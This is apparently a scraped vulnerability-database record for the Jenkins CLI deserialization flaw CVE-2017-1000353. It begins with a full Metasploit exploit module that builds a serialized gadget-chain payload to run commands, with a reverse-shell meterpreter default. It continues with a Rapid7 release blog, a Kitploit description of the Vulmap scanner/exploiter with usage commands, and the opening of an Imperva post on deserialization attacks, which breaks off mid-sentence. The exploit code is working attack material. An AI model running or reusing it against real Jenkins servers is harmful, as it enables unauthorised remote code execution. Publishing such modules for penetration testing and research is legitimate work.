https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Jenkins CLI Deserialization',\n 'Description' => %q{\n An unauthenticated Java object deserialization vulnerability exists\n in the CLI component for Jenkins versions `v2.56` and below.\n\n The `readFrom` method within the `Command` class in the Jenkins\n CLI remoting component deserializes objects received from clients without\n first checking / sanitizing the data. Because of this, a malicious serialized\n object contained within a serialized `SignedObject` can be sent to the Jenkins\n endpoint to achieve code execution on the target.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SSD', # PoC\n 'Unknown', # Vulnerability discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],\n [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],\n [ 'CVE', '2017-1000353']\n ],\n 'Privileged' => false,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' =>\n [\n [\n 'Linux',\n {\n 'Platform' => 'linux',\n 'CmdStagerFlavor' => [ 'wget', 'curl' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2017-04-26',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ])\n ]\n )\n end\n\n def check\n login_uri = normalize_uri(target_uri.path, 'login')\n login_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => login_uri\n )\n\n return Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res\n\n /Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body\n return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version\n\n vers_no = Gem::Version.new(version)\n return Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54')\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n print_status('Sending payload...')\n execute_cmdstager(noconcat: true)\n end\n\n def format_payload(payload_data)\n formatted_payload = '74'\n formatted_payload << payload_data.length.to_s(16).rjust(4, '0')\n formatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def execute_command(cmd, _opts = {})\n sess_uuid = SecureRandom.uuid\n sess_uri = normalize_uri(target_uri.path, 'cli')\n preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\n\n send_request_cgi(\n {\n 'uri' => sess_uri,\n 'method' => 'POST',\n 'headers' =>\n {\n 'Side' => 'download',\n 'Session' => sess_uuid\n }\n },\n nil, false\n ) # don't wait for response, and don't disconnect\n\n cmd = build_obj(cmd)\n send_request_cgi(\n {\n 'uri' => sess_uri,\n 'method' => 'POST',\n 'data' => preamble + [ cmd ].pack('H*'),\n 'headers' =>\n {\n 'Side' => 'upload',\n 'Session' => sess_uuid\n }\n }\n )\n sleep(2) # give buffer time between requests for processing\n end\n\n def build_obj(obj_data)\n payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'\n payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'\n payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'\n payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'\n payload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e'\n payload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726'\n payload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63'\n payload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6'\n payload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f'\n payload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537'\n payload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44'\n payload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6'\n payload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a'\n payload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7'\n payload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163'\n payload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6'\n payload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'\n payload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657'\n payload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8'\n payload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436'\n payload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c'\n payload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7'\n payload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f'\n payload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547'\n payload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c'\n payload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700'\n payload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078'\n payload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106'\n payload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013'\n payload_data << '75720013'\n payload_data << '5b4c6a6176612e6c616e672e537472696e673b'\n payload_data << 'add256e7e91d7b47'\n payload_data << '020000'\n payload_data << '7870'\n payload_data << '00000001'\n\n obj_data = format_payload(obj_data)\n payload_data << obj_data\n\n payload_data << '740004'\n payload_data << '65786563' # exec\n payload_data << '7571007e0'\n payload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578'\n payload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700'\n payload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878'\n payload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266'\n\n # This index is the length of the serialized\n # object that belongs to the SignedObject\n start_arr = payload_data.index('050daced')\n end_arr = payload_data.index('787571007e')\n new_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2)\n payload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0')\n\n payload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72'\n payload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000'\n payload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c'\n payload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707'\n payload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c'\n payload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136'\n payload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878'\n payload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078'\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/jenkins_cli_deserialization.rb"}], "rapid7blog": [{"lastseen": "2020-09-29T20:39:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000353", "CVE-2018-18556", "CVE-2020-1048", "CVE-2020-12109", "CVE-2020-1472", "CVE-2020-17506"], "description": "\n\nNine! Nine new modules! (Ah ha ha!)\n\nWith the coming of autumn here in the Northern hemisphere, the nights are getting longer, and the hacking is getting stronger. We\u2019ve really got something for everybody in this release, from IoT to infrastructure, Windows, and Linux; everyone\u2019s pretty well-represented!\n\nWindows has been patching several vulnerabilities lately, and we have modules for them! Metasploit\u2019s own [Spencer](<https://github.com/ZeroSteiner>) and [Brendan](<https://github.com/bwatters-r7>) have been working on bringing in work from others; Spencer wrote a Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?#rapid7-analysis>)) module based on the work by Tom Tervoort, and Brendan wrote a module covering the PrinterDemon vulnerability ([CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=wrap-up>)) building on the work of Alex Ionescue and [shubham0d](<https://github.com/shubham0d>).\n\nSpencer also added a new SOCKS module to unite the tribes of proxies currently in Metasploit, with one module to rule them all, and in the darkness, bind them!\n\nNot to be outdone, our own [Shelby](<https://github.com/space-r7>) added to the module count with [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=wrap-up>) and YAJDV (Yet another Java Deserialization Vulnerability) against everyone\u2019s favorite devops tool, Jenkins. Now you can ask Jenkins to test your code _or_ run it! While this vulnerability may be a bit older, we all know people miss patches, so it is worth checking out.\n\nRounding out the Metasploit team\u2019s contributions are [Grant](<https://github.com/gwillcox-r7>) and a new module to gather information on installed software on targets, and when we say targets, we mean it: Windows, Linux, Android, and Mac are all covered by this new gather module!\n\nAs if the Metasploit team\u2019s contributions were not enough, we had some seriously high-quality work come in from our community members as well! Auth bypasses for Artica Proxy by [Niboucha Redouane](<https://github.com/red0xff>), Cloud Camera command injection by Pietro Olivia, VyOS escape by Rich Mirch and [bcoles](<https://github.com/bcoles>), and a SecureCRT password decryptor by cn-kali-team.\n\n## New modules (9)\n\n * [Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14025>) by Max0x4141 and Redouane NIBOUCHA, which exploits [CVE-2020-17506](<https://attackerkb.com/topics/TIR8HEspsz/cve-2020-17506?referrer=blog>)\n * [Jenkins CLI Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14122>) by SSD, Shelby Pace, and Unknown, which exploits [CVE-2017-1000353](<https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353?referrer=blog>)\n * [TP-Link Cloud Cameras NCXXX Bonjour Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14135>) by Pietro Oliva, which exploits [CVE-2020-12109](<https://attackerkb.com/topics/TTBzMpfHr2/cve-2020-12109?referrer=blog>)\n * [VyOS restricted-shell Escape and Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/14123>) by Rich Mirch and bcoles, which exploits [CVE-2018-18556](<https://attackerkb.com/topics/75ZrO8GTzs/cve-2018-18556?referrer=blog>)\n * [Microsoft Spooler Local Privilege Elevation Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14023>) by Alex Ionescu, Yarden Shafir, bwatters-r7, and shubham0d, which exploits [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>)\n * [Netlogon Weak Cryptographic Authentication](<https://github.com/rapid7/metasploit-framework/pull/14151>) by Dirk-jan Mollema, Spencer McIntyre, and Tom Tervoort, which exploits [CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)\n * [SOCKS Proxy Server](<https://github.com/rapid7/metasploit-framework/pull/14173>) by Spencer McIntyre, sf, and surefire\n * [Multiplatform Installed Software Version Enumerator](<https://github.com/rapid7/metasploit-framework/pull/14140>) by gwillcox-r7\n * [Windows SecureCRT Session Information Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14118>) by HyperSine and Kali-Team\n\n## Bugs fixed\n\n * [Show correct rank for show exploits command](<https://github.com/rapid7/metasploit-framework/pull/14176>) from [Alan David Foster](<https://github.com/adfoster-r7>) fixes a bug where the ranking for exploits was not shown properly when the `show exploits` command was used.\n * [Always display `SRVHOST` and `SRVPORT` options when `CMDSTAGER::FLAVOR` is set to `auto`](<https://github.com/rapid7/metasploit-framework/pull/14153>) from [Christophe](<https://github.com/cdelafuente-r7>) fixes a bug where the SRVPORT and SRVHOST parameters are not displayed properly if the command stager flavor is set to `auto`\n * [Fix is_known_pipename module](<https://github.com/rapid7/metasploit-framework/pull/14035>) also from Christophe fixes an issue in the is_known_pipename exploit module which targets samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog \npost from GitHub:\n\n * [Pull Requests 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-17T11%3A03%3A21-05%3A00..2020-09-24T11%3A12%3A08-05%3A00%22>)\n * [Full diff 6.0.7...6.0.8](<https://github.com/rapid7/metasploit-framework/compare/6.0.7...6.0.8>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>)(master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-09-25T18:54:14", "published": "2020-09-25T18:54:14", "id": "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "href": "https://blog.rapid7.com/2020/09/25/metasploit-wrap-up-80/", "type": "rapid7blog", "title": "Metasploit Wrap-up", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", "CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "[  ](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists. \n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [ Options ](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited. \n\n** Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3, python3.7 or higher is recommended \n\n * Installation dependency \n \n \n pip3 install -r requirements.txt\n \n\n * Linux &amp; MacOS &amp; Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vuln \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List \n\nVulmap supported vulnerabilities are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "bulletinFamily": "blog", "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 